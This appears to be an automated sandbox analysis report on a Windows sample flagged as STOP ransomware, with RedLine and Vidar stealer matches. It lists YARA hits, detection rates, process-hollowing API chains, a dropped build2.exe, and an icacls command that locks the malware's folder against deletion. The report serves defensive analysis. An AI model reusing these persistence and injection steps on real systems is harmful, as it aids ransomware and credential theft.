Source: 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000000.401628959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000B.00000000.401628959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000B.00000000.401628959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000000.400942313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000B.00000000.400942313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000B.00000000.400942313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000007.00000002.421698327.0000000002162000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000D.00000000.410711943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 00000001.00000000.353670554.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000001.00000000.353670554.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.353670554.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000002.427284724.0000000000696000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000A.00000002.404465575.00000000007FF000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000F.00000000.425807997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000F.00000000.425807997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000F.00000000.425807997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.351845503.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000001.00000000.351845503.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.351845503.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000000.379133244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000008.00000000.379133244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000000.379133244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 2OmglUwx83.exe PID: 3456, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 2OmglUwx83.exe PID: 5360, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 2OmglUwx83.exe PID: 5272, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 2OmglUwx83.exe PID: 3044, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 2OmglUwx83.exe PID: 5076, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 2OmglUwx83.exe PID: 1504, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 2OmglUwx83.exe PID: 5944, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 2OmglUwx83.exe PID: 3788, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: build2.exe PID: 5652, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: Process Memory Space: 2OmglUwx83.exe PID: 4444, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 2OmglUwx83.exe PID: 4484, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: String function: 0040F4B0 appears 127 times
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: String function: 0042F7C0 appears 54 times
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: String function: 0044F23E appears 44 times
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: String function: 00428520 appears 51 times
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: String function: 022B8EC0 appears 37 times
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: String function: 004547A0 appears 31 times
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: String function: 0040E1A0 appears 171 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_02290110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 0_2_02290110
Source: 2OmglUwx83.exe Static PE information: Section: .data ZLIB complexity 0.9924791355588737
Source: 2OmglUwx83.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169 Jump to behavior
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@22/447@8/6
Source: C:\Users\user\Desktop\2OmglUwx83.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_00409605 GetComputerNameW,LoadLibraryA,LoadLibraryW,GetProcAddress,InterlockedExchangeAdd,VerifyVersionInfoW,GetTickCount,DebugBreak,GetConsoleAliasExesLengthW,GetPrivateProfileIntA,GetLastError,GetSystemWow64DirectoryW,IsDBCSLeadByte,CreateMailslotA,GetStartupInfoW,InterlockedExchangeAdd,_hwrite,HeapSize,VerifyVersionInfoW,InterlockedIncrement,InterlockedIncrement,AddAtomA,WriteProfileSectionW,GetConsoleAliasesLengthW,GetSystemDefaultLangID,CreateNamedPipeW,AbortSystemShutdownW,ImpersonateNamedPipeClient,LoadLibraryA,GetOverlappedResult,FindNextVolumeW,LeaveCriticalSection,GetModuleHandleW,FormatMessageW,CreateActCtxA,CopyFileW,GetConsoleTitleA,VerifyVersionInfoW,InterlockedIncrement,InterlockedExchangeAdd,InterlockedIncrement,GetCommandLineA,SetLastError,MoveFileWithProgressW,VerifyVersionInfoA, 0_2_00409605
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_00409909 GetCursorInfo,CharUpperA,GetConsoleAliasesLengthW,GetDefaultCommConfigW,GetProfileSectionA,_puts,GetFileInformationByHandle,_realloc,_realloc,_realloc,_fseek,SetCalendarInfoA,SetCalendarInfoA,SetCurrentDirectoryW,BuildCommDCBAndTimeoutsW,CreateFileW,OpenJobObjectA,WriteConsoleOutputCharacterA,MapUserPhysicalPages,AddAtomA,GetThreadPriority,GetFullPathNameA,FindNextVolumeMountPointW,FillConsoleOutputCharacterA,EnumResourceNamesW,OpenWaitableTimerW,LocalSize,_hwrite,GetPrivateProfileStructA,GetComputerNameW,EnumDateFormatsExA,GetConsoleAliasesW,GetComputerNameW,GetConsoleTitleA,GetSystemWindowsDirectoryW,SetCalendarInfoA,GetFileAttributesA,HeapFree,lstrcpyW,LocalAlloc,GetConsoleFontSize,EnumDateFormatsA,ConvertThreadToFiber,InterlockedCompareExchange,VerifyVersionInfoA,FormatMessageW,SetCommState,FindResourceA,CreateMutexA,MoveFileA,LockFileEx,ResetEvent,FindNextFileW,GetComputerNameExA,CopyFileW,FileTimeToSystemTime,EnumSystemLocalesA,GetComputerNameW,WriteConsoleA,GlobalGetAtomNameW,LoadLibraryA,SetConsoleWindowInfo,GetCPInfoExW,EnumResourceLanguagesA,TerminateThread,GetDiskFreeSpaceExW,GetPrivateProfileStructW,GetConsoleAliasW,lstrcpyA,GetOEMCP,ExitThread, 0_2_00409909
Source: 2OmglUwx83.exe Virustotal: Detection: 54%
Source: 2OmglUwx83.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\Desktop\2OmglUwx83.exe File read: C:\Users\user\Desktop\2OmglUwx83.exe Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\2OmglUwx83.exe "C:\Users\user\Desktop\2OmglUwx83.exe"
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\Desktop\2OmglUwx83.exe "C:\Users\user\Desktop\2OmglUwx83.exe"
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\Desktop\2OmglUwx83.exe "C:\Users\user\Desktop\2OmglUwx83.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe --Task
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\Desktop\2OmglUwx83.exe "C:\Users\user\Desktop\2OmglUwx83.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe --Task
Source: unknown Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe" --AutoStart
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe" --AutoStart
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe "C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe"
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Process created: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe "C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe" --AutoStart
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe" --AutoStart
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\Desktop\2OmglUwx83.exe "C:\Users\user\Desktop\2OmglUwx83.exe" Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169" /deny *S-1-1-0:(OI)(CI)(DE,DC) Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\Desktop\2OmglUwx83.exe "C:\Users\user\Desktop\2OmglUwx83.exe" --Admin IsNotAutoStart IsNotTask Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\Desktop\2OmglUwx83.exe "C:\Users\user\Desktop\2OmglUwx83.exe" --Admin IsNotAutoStart IsNotTask Jump to behavior
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe --Task Jump to behavior
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe "C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe" --AutoStart Jump to behavior
Source: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe Process created: C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe "C:\Users\user\AppData\Local\0ca24ce5-0f24-4ca6-b87c-11cb41906c23\build2.exe"
